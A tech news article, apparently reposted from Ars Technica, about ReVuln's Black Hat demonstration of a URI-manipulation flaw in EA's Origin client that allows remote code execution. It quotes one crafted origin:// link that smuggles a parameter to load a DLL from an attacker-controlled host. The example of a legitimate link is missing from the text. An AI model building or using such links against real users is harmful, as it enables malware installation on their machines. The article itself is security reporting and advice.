During the Black Hat security conference in Amsterdam, an attack was demonstrated on EA’s infamous Origins service (think of it as the company’s Steam). The fact that an estimation of 40 million accounts could be in danger is obviously alarming but what’s even more distressing is how long it took to execute the attack — it only took seconds.
ReVuln, a company dedicated to security research and solutions, said that the potential victims don’t even have to have any interaction with their account to succumb to a possible attack. This particular attack is done by uniform resource identifier (URI) manipulation. Specifically, the URI’s used by Origin to automatically start games on an end user’s machine, whether that machine be a Mac or a PC. This essentially transforms Origin from a gaming platform to a launching pad for malware.
In a document published by ReVuln, company researchers Donato Ferrante and Luigi Auriemma said that malicious users can craft Internet links that execute malicious code remotely. As mentioned before, this affects computers — Mac or PC — with Origin installed on it. There’s also a video that demonstrates ReVuln taking control of a computer with Origin and a copy of Crysis 3 installed. If you’re at all curious at what an authentic EA URI would be between a malicious one, here’s how it looks:
This would launch the game in the way it should be launched. A fraudulent link would look more like this:
origin://LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll
This, according to ReVuln, will load a Windows dynamic link library file in which an attacker is able to have open season with. EA, in an e-mail to Ars Technica, said that their team is constantly running hypotheticals and investigating into how to always update their security infrastructure. Basically, you’re going to want to change your settings in order to disable auto-launching — you’re going to want that link to prompt you for the time being.
Source: Ars Technica